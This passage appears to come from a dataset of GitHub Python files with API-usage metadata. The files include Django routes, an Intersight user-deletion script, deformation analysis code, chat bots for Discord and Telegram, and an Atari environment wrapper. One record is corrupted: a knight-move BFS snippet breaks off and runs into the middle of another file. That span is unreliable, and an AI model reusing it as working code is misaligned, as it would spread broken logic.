"call"}, {"api_name": "helpers.logger.LOG", "line_number": 303, "usage_type": "name"}, {"api_name": "time.time", "line_number": 314, "usage_type": "call"}, {"api_name": "yarl.URL", "line_number": 317, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 317, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 320, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 320, "usage_type": "name"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "aiohttp.client_exceptions.ClientConnectorError", "line_number": 328, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 329, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 329, "usage_type": "name"}, {"api_name": "aiohttp.client_exceptions.InvalidURL", "line_number": 331, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 332, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 332, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPError", "line_number": 334, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 334, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 335, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 335, "usage_type": "name"}]} +{"seq_id": "73963340327", "text": "from django.contrib.auth.views import LogoutView\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.dashboard, name='homepage'),\n path('id/', views.dashboard_id, name='homepage_id'),\n path('login/', views.login_page, name='login'),\n path(\"logout/\", LogoutView.as_view(template_name='login.html'), name=\"logout\"),\n path('register/', views.register_page, name='register'),\n path('activate/', views.activate, name='activate'),\n]", "repo_name": "tomyhrdnsyh/Website-Gym-Member-Register", "sub_path": "dashboard/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "20974563468", "text": "#!/usr/bin/env python\n\"\"\"Delete an Intersight user by Cisco.com ID via the Intersight API.\"\"\"\nimport sys\nimport json\nimport argparse\nfrom intersight.intersight_api_client import IntersightApiClient\nfrom intersight.apis import iam_user_api\n\n\ndef delete_user(intersight_api_params, user_email):\n# Create Intersight API instance\n # ----------------------\n api_instance = IntersightApiClient(\n host=intersight_api_params['api_base_uri'],\n private_key=intersight_api_params['api_private_key_file'],\n api_key_id=intersight_api_params['api_key_id'],\n )\n\n try:\n # GET Users\n users_handle = iam_user_api.IamUserApi(api_instance)\n kwargs = dict(filter=\"Email eq '%s'\" % 
user_email)\n users_result = users_handle.iam_users_get(**kwargs)\n if users_result.results:\n # DELETE Users\n users_delete_result = users_handle.iam_users_moid_delete(moid=users_result.results[0].moid)\n else:\n print(\"User not found:\", user_email)\n\n except Exception as err:\n print(\"Exception:\", str(err))\n import traceback\n print('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print('-' * 60)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--id', required=True, help='Cisco email ID of the user to delete')\n help_str = 'JSON file with Intersight API parameters. Default: intersight_api_params.json'\n parser.add_argument('-a', '--api_params', default='intersight_api_params.json', help=help_str)\n args = parser.parse_args()\n with open(args.api_params, 'r') as api_file:\n intersight_api_params = json.load(api_file)\n\n delete_user(intersight_api_params, args.id)\n\n sys.exit(0)\n", "repo_name": "CiscoUcs/intersight-python", "sub_path": "examples/delete_user.py", "file_name": "delete_user.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "intersight.intersight_api_client.IntersightApiClient", "line_number": 13, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api.IamUserApi", "line_number": 21, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api", "line_number": 21, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 34, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "17441391104", "text": "from collections import deque\ndx=[-2,-1,2,1,2,1,-2,-1]\ndy=[1,2,1,2,-1,-2,-1,-2]\n\ndef bfs(sx,sy,ex,ey, l):\n visited = [[0] * l for _ in range(l)]\n q = deque()\n q.append([sx,sy])\n visited[sy][sx] = 1\n while bool(q):\n x, y = q.popleft()\n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx=self.bound\n cond_y = abs(nextpoint[1])>=self.bound\n cond_z = abs(nextpoint[2])>=self.bound\n\n if cond_x or cond_y or cond_z:\n break\n\n self.points = np.vstack((self.points, nextpoint)) \n\n def save_to_vtk(self, fname, sep=\",\"):\n point_data = pyvtk.PointData(\\\n pyvtk.Vectors(self.u, name=\"u\"),\n pyvtk.Tensors(arr_to_tensor(self.F), name=\"F\"),\n pyvtk.Tensors(arr_to_tensor(self.C), name=\"C\"),\n pyvtk.Tensors(arr_to_tensor(self.R), name=\"R\"),\n pyvtk.Tensors(arr_to_tensor(self.U), name=\"U\"),\n pyvtk.Vectors(self.eigval, name=\"w\"),\n pyvtk.Tensors(arr_to_tensor(self.eigvec), name=\"v\"),\n pyvtk.Scalars(self.mu, name=\"mu\"),\n pyvtk.Scalars(self.stretches, \"stretches\")\n )\n\n # print(pyvtk.Tensors(3, \"3\"))\n\n vtk = pyvtk.VtkData(\\\n pyvtk.PolyData(self.points), \n point_data\n )\n\n vtk.tofile(fname) \n\n def calc_deformation(self):\n \n # Deformations\n super().calc_deformation()\n\n # Stretches\n npoints = self.points.shape[0]\n v = np.broadcast_to(self.direction, (npoints, 3))\n v = np.ascontiguousarray(v)\n v = v.reshape((-1, 3, 1))\n\n self.stretches = np.matmul(v.transpose(0, 2, 1), np.matmul(self.C, v)) ** 0.5\n self.stretches = self.stretches.flatten()\n\n def assemble_df(self):\n super().assemble_df()\n self.df[\"stretches\"] = self.stretches\n\n\n", 
"repo_name": "jdsteinman/Gel-Model", "sub_path": "bar/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 12505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.asarray", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 148, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 149, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 150, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 151, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 152, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 153, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 154, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 155, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 156, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 160, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.linalg.polar", "line_number": 180, "usage_type": "call"}, {"api_name": 
"numpy.matmul", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 354, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 380, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 383, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 384, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 385, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 386, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 387, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 388, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 389, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 390, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 391, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 392, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 397, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.broadcast_to", "line_number": 411, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 415, "usage_type": "call"}]} +{"seq_id": "9297894862", "text": "\"\"\"\nCommand-Line interface functionality for synchronization\n\"\"\"\nimport json\nimport argparse\nimport cattr\nfrom nowcastlib.pipeline.structs import config\nfrom nowcastlib.pipeline import sync\n\n\ndef configure_parser(action_object):\n \"\"\"Configures the subparser for our preprocess command\"\"\"\n sparser = action_object.add_parser(\n \"sync\",\n description=\"Synchronize datasets\",\n help=\"Run `nowcastlib sync -h` for further help\",\n formatter_class=argparse.HelpFormatter,\n )\n sparser.add(\n \"-c\",\n \"--config\",\n required=True,\n help=\"path to JSON file following the DataSet format. 
See docs for available fields\",\n )\n\n\ndef run(args):\n \"\"\"runs appropriate function based on provided cli args\"\"\"\n with open(args.config) as json_file:\n options = json.load(json_file)\n cattr_cnvrtr = cattr.GenConverter(forbid_extra_keys=True)\n dataset_config = cattr_cnvrtr.structure(options, config.DataSet)\n return sync.synchronize_dataset(dataset_config)\n", "repo_name": "thesofakillers/nowcastlib", "sub_path": "nowcastlib/pipeline/sync/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 1020, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.HelpFormatter", "line_number": 17, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": "cattr.GenConverter", "line_number": 31, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.structs.config.DataSet", "line_number": 32, "usage_type": "attribute"}, {"api_name": "nowcastlib.pipeline.structs.config", "line_number": 32, "usage_type": "name"}, {"api_name": "nowcastlib.pipeline.sync.synchronize_dataset", "line_number": 33, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.sync", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "33674957269", "text": "import hikari\nimport requests\nimport os\nfrom dotenv import load_dotenv\nfrom nft import fetcher\nfrom crypto import coinFetcher\nfrom stocks import stockFetcher, afterHoursFetcher\nload_dotenv(override=False)\ndiscord_token = os.environ.get('TOKEN')\nadmin_token=os.environ.get('ADMIN')\n\n\n#intent\nbot = hikari.GatewayBot(\n discord_token,\n intents=hikari.Intents.ALL_UNPRIVILEGED # Add this\n | hikari.Intents.MESSAGE_CONTENT, # \n)\n\n\n@bot.listen()\nasync def ping(event: hikari.GuildMessageCreateEvent) -> None:\n if event.content and event.content.startswith(\"t\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n coins = message.split(\" \")\n response = \"\"\n for coin in coins:\n price = coinFetcher(coin)\n response += f\"**{coin}**: ${price}\\n\"\n await event.message.respond(response)\n \n if event.content and event.content.startswith(\"p\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = stockFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\n if event.content and event.content.startswith(\"pa\") and event.content[2] == \" \":\n message = (event.content[3:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = afterHoursFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\nbot.run()\n", "repo_name": "Jckhe/Jack-Bot", "sub_path": "jackbot.py", "file_name": "jackbot.py", "file_ext": "py", "file_size_in_byte": 1491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "hikari.GatewayBot", "line_number": 14, "usage_type": "call"}, {"api_name": "hikari.Intents", "line_number": 16, "usage_type": "attribute"}, {"api_name": "hikari.Intents", "line_number": 17, "usage_type": "attribute"}, {"api_name": 
"hikari.GuildMessageCreateEvent", "line_number": 22, "usage_type": "attribute"}, {"api_name": "crypto.coinFetcher", "line_number": 28, "usage_type": "call"}, {"api_name": "stocks.stockFetcher", "line_number": 36, "usage_type": "call"}, {"api_name": "stocks.afterHoursFetcher", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "9468537762", "text": "import sys\nimport os\nfrom ale_python_interface import ALEInterface\nimport cv2\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass Environment:\n def __init__(self, rom_file, args):\n self.ale = ALEInterface()\n if args.display_screen:\n if sys.platform == 'darwin':\n import pygame\n pygame.init()\n self.ale.setBool('sound', False) # Sound doesn't work on OSX\n elif sys.platform.startswith('linux'):\n self.ale.setBool('sound', True)\n self.ale.setBool('display_screen', True)\n\n self.ale.setInt('frame_skip', args.frame_skip)\n self.ale.setFloat('repeat_action_probability', args.repeat_action_probability)\n self.ale.setBool('color_averaging', args.color_averaging)\n\n if args.random_seed:\n self.ale.setInt('random_seed', args.random_seed)\n\n if args.record_screen_path:\n if not os.path.exists(args.record_screen_path):\n logger.info(\"Creating folder %s\" % args.record_screen_path)\n os.makedirs(args.record_screen_path)\n logger.info(\"Recording screens to %s\", args.record_screen_path)\n self.ale.setString('record_screen_dir', args.record_screen_path)\n\n if args.record_sound_filename:\n logger.info(\"Recording sound to %s\", args.record_sound_filename)\n self.ale.setBool('sound', True)\n self.ale.setString('record_sound_filename', args.record_sound_filename)\n\n self.ale.loadROM(rom_file)\n\n if args.minimal_action_set:\n self.actions = self.ale.getMinimalActionSet()\n logger.info(\"Using minimal action set with size %d\" % len(self.actions))\n else:\n self.actions = self.ale.getLegalActionSet()\n logger.info(\"Using full action set with size %d\" % len(self.actions))\n logger.debug(\"Actions: \" + str(self.actions))\n\n self.dims = (args.screen_height, args.screen_width)\n\n def numActions(self):\n return len(self.actions)\n\n def restart(self):\n self.ale.reset_game()\n\n def act(self, action):\n reward = self.ale.act(self.actions[action])\n return reward\n\n def getScreen(self):\n screen = self.ale.getScreenGrayscale()\n resized = cv2.resize(screen, self.dims)\n return resized\n\n def isTerminal(self):\n return self.ale.game_over()\n", "repo_name": "rickyHong/simple_dqn", "sub_path": "src/environment.py", "file_name": "environment.py", "file_ext": "py", "file_size_in_byte": 2188, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "ale_python_interface.ALEInterface", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.platform.startswith", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "18843669209", "text": "# coding: utf-8\n\nimport asyncio\nimport json\nimport 
re\nfrom datetime import datetime\nfrom urllib import parse\n\nimport aiohttp\nimport asyncio_redis\nimport telepot\nimport telepot.aio\nfrom telepot.namedtuple import ReplyKeyboardMarkup, ReplyKeyboardRemove\n\nfrom constants import GAME_CARD_TEMPLATE, NEWS_CARD_TEMPLATE, LANG, CC\nfrom utils import SearchSuggestParser, cache_steam_response, group\n\n\nclass SteamBot(telepot.aio.Bot, telepot.helper.AnswererMixin):\n\n def __init__(self, *args, config=None, **kwargs):\n super(SteamBot, self).__init__(*args, **kwargs)\n self._answerer = telepot.aio.helper.Answerer(self)\n self.config = config\n self.cache_time = self.config.get('cache_time', 10)\n self.redis_conn = None\n self.loop.create_task(self.initialize_redis())\n self.routes = {\n '/search': self.search_game,\n '/app_': self.game_card_answer,\n '/scr_': self.screenshots_answer,\n '/news_': self.last_news_answer,\n '/feedback': self.feedback_answer,\n '/settings': self.settings_answer,\n '/lang': self.set_lang,\n '/cc': self.set_cc,\n '/start': self.welcome_answer\n }\n\n async def initialize_redis(self):\n self.redis_conn = await asyncio_redis.Pool.create(\n host=self.config['redis']['ip'],\n port=self.config['redis']['port'],\n db=self.config['redis']['db'],\n poolsize=5\n )\n\n @cache_steam_response\n async def get_content_from_url(self, url, resp_format=None):\n async with aiohttp.ClientSession(loop=self.loop) as client:\n async with client.get(url) as resp:\n if resp.status != 200:\n return\n if resp_format == 'text':\n result = await resp.text()\n elif resp_format == 'json':\n result = await resp.json()\n else:\n result = await resp.content.read()\n return result\n\n async def get_search_results(self, term, settings):\n search_url = u'https://store.steampowered.com/search/suggest?term={}&f=games&l={}&cc={}'.format(\n parse.quote_plus(term),\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(search_url, resp_format='text')\n parser = SearchSuggestParser()\n parser.feed(content)\n return parser.result\n\n async def get_appdetails(self, appid, settings={}):\n url = u'https://store.steampowered.com/api/appdetails/?appids={}&l={}&cc={}'.format(\n appid,\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content[appid]['data'] if content else {}\n\n async def get_news(self, appid, count=3):\n url = u'https://api.steampowered.com/ISteamNews/GetNewsForApp/v0002/?appid={}&count={}&max_length=300&format=json'.format(\n appid,\n count\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content['appnews']['newsitems'] if content else {}\n\n @staticmethod\n def get_command(msg):\n if 'entities' in msg:\n for entity in msg['entities']:\n if entity['type'] == 'bot_command':\n offset, length = entity['offset'], entity['length']\n return msg['text'][offset:length], msg['text'][offset + length:].strip()\n return None, None\n\n @staticmethod\n def get_games_message(entries):\n msg_list = []\n if len(entries) != 0:\n for entry in entries:\n msg = u\"{cmd} {name} [steam]({href}) _{price}_\".format(\n name=entry['name'],\n href=entry['href'],\n price=entry['price'],\n cmd=u'/app\\_{}'.format(entry['appid'])\n )\n msg_list.append(msg)\n return u'\\n'.join(msg_list)\n return u'Nothing found'\n\n @staticmethod\n def clean_html(html):\n return re.sub('<[^<]+?>', '', html)\n\n @staticmethod\n def clean_markdown(text):\n return text.replace('_', '\\_').replace('*', '\\*')\n\n def get_game_card_message(self, 
appdetails):\n return GAME_CARD_TEMPLATE.format(\n appid=appdetails['steam_appid'],\n name=appdetails['name'],\n release_date=appdetails['release_date']['date'],\n metacritic=u'\\u2b50\\ufe0f{} [metacritics]({})'.format(\n appdetails['metacritic']['score'],\n appdetails['metacritic']['url']\n ) if 'metacritic' in appdetails else '',\n platforms=', '.join(\n [x[0] for x in appdetails['platforms'].items() if x[1]]),\n genres=', '.join(\n [x['description'] for x in appdetails['genres']]) if 'genres' in appdetails else '',\n publishers=', '.join(\n appdetails['publishers']) if 'publishers' in appdetails else '',\n price='{} {}'.format(appdetails['price_overview']['final'] / 100.0,\n appdetails['price_overview']['currency']) if 'price_overview' in appdetails else '',\n recommendations=appdetails['recommendations']['total'] if 'recommendations' in appdetails else '',\n screenshotscount=len(\n appdetails['screenshots']) if 'screenshots' in appdetails else '0',\n about_the_game=self.clean_html(appdetails['about_the_game'])[:500]\n )\n\n async def on_callback_query(self, msg):\n query_id, from_id, data = telepot.glance(msg, flavor='callback_query')\n print('Callback query:', query_id, from_id, data)\n self.route(from_id, data)\n\n async def game_search_answer(self, term, chat_id):\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n msg = self.get_games_message(await self.get_search_results(term, settings))\n await self.sendMessage(chat_id, msg, parse_mode='markdown', disable_web_page_preview=True)\n\n async def game_card_answer(self, chat_id, command, args):\n appid = command.replace('/app_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n app_details = await self.get_appdetails(appid, settings)\n await self.sendMessage(chat_id, self.get_game_card_message(app_details), parse_mode='markdown')\n\n async def send_photo_from_url(self, url, photo_name, chat_id):\n downloaded_file = await self.get_content_from_url(url)\n await self.sendPhoto(chat_id, photo=(photo_name, downloaded_file))\n\n async def screenshots_answer(self, chat_id, command, args):\n appid = command.replace('/scr_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'upload_photo'))\n app_details = await self.get_appdetails(appid)\n for scr in app_details['screenshots']:\n loop.create_task(self.send_photo_from_url(\n scr['path_full'], 'scr-{}.jpg'.format(scr['id']), chat_id))\n\n async def last_news_answer(self, chat_id, command, args):\n appid = command.replace('/news_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n news_items = await self.get_news(appid)\n for item in news_items:\n msg = NEWS_CARD_TEMPLATE.format(\n title=item['title'],\n url=item['url'],\n pub_date=datetime.fromtimestamp(\n int(item['date'])).strftime(\"%B %d, %Y\"),\n feedlabel=item['feedlabel'],\n contents=self.clean_markdown(self.clean_html(item['contents'])).replace(\n '\\n', '').replace(' ', '')[:300],\n author=item['author']\n )\n loop.create_task(self.sendMessage(\n chat_id, msg, parse_mode='markdown'))\n\n def get_user_key(self, user_id):\n return 'user-{}'.format(user_id)\n\n async def save_user_settings(self, user_id, new_settings):\n key = self.get_user_key(user_id)\n user = await self.get_user(user_id)\n settings = user.get('settings', {})\n settings.update(new_settings)\n user['settings'] = settings\n await self.redis_conn.set(key, json.dumps(user))\n\n async def 
get_user(self, user_id):\n return json.loads(await self.redis_conn.get(self.get_user_key(user_id)))\n\n async def create_or_update_user(self, chat):\n key = self.get_user_key(chat['id'])\n user = await self.redis_conn.get(key)\n if not user:\n new_user = chat\n default_settings = {\n 'lang': 'english',\n 'cc': 'US'\n }\n new_user_serialized = json.dumps(\n {'info': new_user, 'settings': default_settings})\n await self.redis_conn.set(key, new_user_serialized)\n else:\n user = json.loads(user)\n if chat != user['info']:\n user['info'] = chat\n await self.redis_conn.set(key, json.dumps(user))\n\n async def on_inline_query(self, msg):\n async def compute_answer():\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='inline_query')\n print('inline query: {} from_id: {}'.format(query_string, from_id))\n user_info = await self.get_user(from_id)\n settings = user_info.get('settings')\n results = await self.get_search_results(query_string, settings)\n articles = []\n for res in results:\n articles.append({\n 'type': 'article',\n 'id': res['appid'],\n 'title': res['name'],\n 'message_text': u'{} {} {}'.format(\n res['name'],\n res['price'],\n res['href']\n ),\n # 'url': res['href'],\n 'description': res['price'],\n 'thumb_url': res['image']\n })\n return {'results': articles}\n self._answerer.answer(msg, compute_answer)\n\n async def on_chosen_inline_result(self, msg):\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='chosen_inline_result')\n print('Chosen Inline Result: {} {} from_id: {}'.format(\n query_id, query_string, from_id))\n await self.game_card_answer(query_id, from_id)\n\n async def search_game(self, chat_id, command, args):\n await self.sendChatAction(chat_id, 'typing')\n await self.game_search_answer(args, chat_id)\n\n async def set_lang(self, chat_id, command, args):\n lang = args.strip() if args else None\n if lang:\n await self.save_user_settings(chat_id, {'lang': LANG.get(lang)})\n await bot.sendMessage(chat_id, 'language saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/lang' + x for x in LANG.keys()], 2),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set language', reply_markup=markup)\n\n async def set_cc(self, chat_id, command, args):\n cc = args.strip() if args else None\n if cc:\n await self.save_user_settings(chat_id, {'cc': CC.get(cc)})\n await bot.sendMessage(chat_id, 'region saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/cc' + x for x in CC.keys()], 3),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set region', reply_markup=markup)\n\n async def feedback_answer(self, chat_id, command, args):\n msg = args.replace('/feedback ', '').strip()\n if msg:\n await self.sendMessage(\n self.config.get('admin_id'),\n 'feedback from: {}: {}'.format(chat_id, msg)\n )\n await self.sendMessage(chat_id, 'thank you for your feedback!')\n else:\n await self.sendMessage(chat_id, 'looks like your feedback is empty!')\n\n async def settings_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n \"change region: /cc\\n\"\n \"change language: /lang\\n\"\n )\n\n async def welcome_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n 'Welcome! 
Just type / for view list of commands, also you can use this bot with inline mode.\\n'\n 'For search a game just send message with game title'\n )\n\n def route(self, chat_id, command, args=None):\n func = None\n for cmd, fnc in self.routes.items():\n if command.find(cmd) != -1:\n func = fnc\n break\n\n if func:\n self.loop.create_task(func(chat_id, command, args))\n\n async def on_chat_message(self, msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(msg)\n await self.create_or_update_user(msg.get('chat'))\n command, args = self.get_command(msg)\n if not command:\n command, args = '/search', msg['text']\n self.route(chat_id, command, args)\n\n\nwith open('conf/config.json') as f:\n config = json.loads(f.read())\n\nloop = asyncio.get_event_loop()\ntoken = config.pop(\"telegram_token\")\nbot = SteamBot(token=token, config=config, loop=loop)\nloop.create_task(bot.message_loop())\nprint('Listening ...')\nloop.run_forever()\n", "repo_name": "AyumuKasuga/steambot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 13818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "telepot.aio", "line_number": 